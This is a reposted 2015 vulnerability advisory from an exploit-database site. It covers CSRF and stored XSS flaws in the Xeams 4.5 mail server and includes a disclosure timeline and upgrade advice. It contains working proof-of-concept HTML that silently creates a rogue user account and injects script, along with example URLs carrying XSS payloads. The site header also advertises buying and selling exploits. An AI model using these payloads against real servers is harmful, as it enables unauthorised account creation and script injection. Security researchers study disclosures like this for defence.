0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Xeams 4.5 Build 5755 - CSRF / XSS Vulnerabilities
# Exploit Title: Multiple vulnerabilities in Xeams 4.5 Build 5755 (CSRF/Stored XSS) # Date: 07-05-2015 # Exploit Author: Marlow Tannhauser # Contact: marlowtannhauser@gmail.com # Vendor Homepage: http://www.synametrics.com # Software Link: http://web.synametrics.com/XeamsDownload.htm # Version: 4.5 Build 5755. Earlier versions may also be affected. # CVE: 2015-3141 (Xeams) # Category: Web apps # DISCLOSURE TIMELINE # 08/02/2015: Initial disclosure to vendor and CERT 09/02/2015: Acknowledgment of vulnerabilities from vendor 11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor 19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request 09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request 20/04/2015: Confirmation of fix from vendor 07/05/2015: Disclosure Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. Note also that this is a different vulnerability from CVE 2012-2569. # EXPLOIT DESCRIPTION # Xeams 4.5 Build 5755 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests. # POC 1 # The following PoC uses the CSRF vulnerability to create a new SMTP domain in the application, and combines it with one of the stored XSS vulnerabilities. <html> <img src="http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&operation=160" alt="" width="1" height="1"> </html> # POC 2 # The following PoC uses the CSRF vulnerability to create a new user with the details shown. <html> <img src="http://192.168.1.67:5272/FrontController?txtEmail=marlow@marlow.com&txtPwd=marlow&txtPwd1=marlow&chkActivate=on&chkNotify=on&reportTime_0=0&reportTime_1=- 1&reportTime_2=- 1&reportTime_3=- 1&reportTime_4=- 1&chkServerHost=192.168.1.67&SaveAndClose=Save&operation=504" alt="" width="1" height="1"> </html> # STORED XSS VULNERABILITIES # Stored XSS vulnerabilities are present in the following fields: Server Configuration > SMTP Configuration > Domain Configuration > New domain name field Example URL: http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22ONE%22%29%3C%2Fscript%3E&operation=160#tab2 Server Configuration > Manage Forwarders > Add a new forwarder > Recipient's address Example URL: http://192.168.0.8:5272/FrontController?txtRecipient=%3Cscript%3Ealert%28%22THREE%22%29%3C%2Fscript%3E&txtIPAddress=127.0.0.1&chkGoodOnly=on&operation=130 Server Configuration > Manage POP3 Fetcher > New Account > POP3 Server field, User Name field, and Recipient field Example URL: http://192.168.0.8:5272/FrontController?popFetchServer=%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&popFetchUser=%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E&popFetchPwd=password&popFetchRecipient=%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&popFetchCount=0&operation=73&index=-1 Server Configuration > Server Configuration > Advanced Configuration > Smtp HELO domain [XSS is displayed in Tools > About Xeams] Example URL: POST request # MITIGATION # Upgrade to the latest build of Xeams, available from the link shown. # 0day.today [2024-12-26] #